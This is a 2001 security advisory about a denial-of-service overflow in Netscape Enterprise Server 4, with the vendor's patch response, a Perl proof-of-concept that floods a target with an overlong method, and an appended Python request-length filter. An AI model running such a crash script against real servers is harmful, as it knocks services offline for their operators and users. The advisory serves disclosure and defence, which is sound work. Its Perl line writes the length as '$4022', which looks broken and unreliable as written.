Netscape Enterprise Server 4 Method and URI overflow

From: Robert Cardona (dasquid@digizen-security.com)
Date: Sat May 19 2001 - 12:27:14 PDT


    Digizen Security Group advisory, 2001
    Netscape Enterprise Server 4 Method and URI overflow
    
    Systems affected:
    Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on
    Windows NT and Win2k
    
    Risk: Denial of Service
    Date: 18 May 2001
    Vendor Notified: 25 April 2001
    
    Legal Notice:
    This Advisory is Copyright (c) 2001 Digizen Security Group and Roberto
    Cardona. You may distribute it unmodified. You may not modify it and
    distribute it or distribute parts of it without the author's written
    permission.
    
    Disclaimer:
    In no event shall the author be liable for any damages whatsoever
    arising out of or in connection with the use of this information.
    Any use of this information is at the user's own risk.
    
    Description:
    
    By sending an invalid method or URI request of 4022 bytes Netscape
    Enterprise Server will stop responding to requests.
    
    Vendor Status:
    Netscape was informed and responded on the same business day.
    
    Vendor's Response:
    
    The security & stability of iPlanet's customer's environments is one of
    our paramount concerns. To ensure the stability of our customer's
    environments iPlanet has made available an NSAPI patch that can be
    applied to iPlanet Web Server, Enterprise Edition version 4.1 Service
    Packs 3 through 7. The NSAPI patch is available at
    http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html.
    This issue will also be addressed by the release of iPlanet Web Server,
    Enterprise Edition version 4.1 Service Pack 8.
    
    --------------------------------------------------------------------------------------
    #!/usr/bin/perl
    use IO::Socket;
      if (@ARGV < 2)  {
         print "Usage: host port\n";
         exit;
       }
    $overflow = "A" x $4022;
    &connect;
    sleep(15);
    &connect;
    exit;
    ################################################
    sub connect() {
      $sock= IO::Socket::INET->new(Proto=>"TCP",
    			     PeerAddr=>$ARGV[0],
    			     PeerPort=>"$ARGV[1]",)
    			     or die "Cant connect to $ARGV[0]: $!\n";
      $sock->autoflush(1);
      print $sock "$overflow /index.html HTTP/1.0\n\n";
      $response=<$sock>;
      print "$response";
      while(<$sock>){
         print "$_\n";
      }
      close $sock;
    }
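
A defensive check for the condition described in the advisory, as an added example that is not part of the original post or of iPlanet's NSAPI patch: a front-end filter that bounds the request line, method and URI before the request reaches the server. The limits, function names and sample request lines are assumptions constructed for illustration.

```python
import io
import re

MAX_METHOD = 16    # assumed limit; standard HTTP methods are far shorter
MAX_URI = 2048     # assumed limit, well under the 4022 bytes in the advisory
MAX_LINE = MAX_METHOD + MAX_URI + 16   # room for spaces, version and CRLF
TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")   # HTTP token characters
VERSION = re.compile(rb"^HTTP/1\.[01]$")


def read_request_line(stream, limit=MAX_LINE):
    """Read at most limit bytes of the first line; None if too long or unterminated."""
    line = stream.readline(limit + 1)   # never buffers more than limit + 1 bytes
    if len(line) > limit or not line.endswith(b"\n"):
        return None
    return line.rstrip(b"\r\n")


def check_request_line(line):
    """Return (status, reason) for a request line; 200 means pass it on."""
    if line is None:
        return 414, "request line too long or unterminated"
    parts = line.split(b" ")
    if len(parts) != 3:
        return 400, "malformed request line"
    method, uri, version = parts
    if len(method) > MAX_METHOD:
        return 501, "method too long"
    if not TOKEN.match(method):
        return 400, "invalid method"
    if len(uri) > MAX_URI:
        return 414, "URI too long"
    if not VERSION.match(version):
        return 400, "bad version"
    return 200, "ok"


def filter_request(raw):
    """Apply both checks to the raw bytes of one request."""
    return check_request_line(read_request_line(io.BytesIO(raw)))


if __name__ == "__main__":
    # Constructed sample request lines, not captured traffic.
    for raw in (b"GET /index.html HTTP/1.0\r\n\r\n",
                b"A" * 100 + b" /index.html HTTP/1.0\n\n",
                b"GET /" + b"a" * 2048 + b" HTTP/1.0\r\n"):
        print(len(raw), filter_request(raw))
```

The status codes follow HTTP's own guidance: 501 for a method longer than any the server implements and 414 for an overlong request target.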
    


